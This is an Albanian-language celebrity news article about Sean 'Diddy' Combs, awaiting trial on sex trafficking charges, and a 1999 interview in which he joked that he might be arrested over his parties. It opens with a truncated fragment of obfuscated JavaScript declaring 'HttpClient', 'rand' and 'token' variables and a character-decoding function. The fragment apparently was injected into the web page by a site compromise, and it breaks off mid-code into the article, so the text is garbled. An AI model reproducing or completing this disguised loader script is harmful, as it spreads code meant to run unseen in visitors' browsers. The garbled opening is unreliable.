;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Diddy e parashikoi arrestimin e tij që para 25 vitesh!

By

Sean Diddy Combs është në qendër të vëmendjes globale pas arrestimit të tij dhe akuzave për trafikim njerëzor dhe abuzim seksual.

Plot 25 vjet më parë, producenti në formë shakaje e “parashikoi” se do të arrestohej.

Në një intervistë të dy dekadave më parë, manjati 54-vjeçar i muzikës foli për festat e tij famëkeqe të bardha, në të cilat morën pjesë njerëz të famshëm duke përfshirë Jay-Z, Jennifer Lopez dhe Leonardo DiCaprio.

Këto ngjarje, të mbajtura në vilat e tij luksoze në mbarë botën, thuhet se u kthyen në festa të egra, të mbushura me alkool.

Duke folur në një video në vitin 1999, Diddy, tani në pritje të gjyqit me akuza për trafik seksual dhe krime të tjera, i tha një gazetari: “Ata nuk do të më japin as një licencë të organizimit të festave. Ata nuk duan që unë të bëj më festa”.

“Por ne nuk do të ndalemi. Ne do të vazhdojmë të argëtohemi, duke mbledhur njerëz nga të gjitha sferat e jetës. Ata do të ndërpresin festat dhe do t’i ndalojnë. Ndoshta do të më arrestojnë duke bërë çmenduri të ndryshme, vetëm sepse duam të kemi një kohë e mirë”, tha ai.

Artikuj të ngjashëm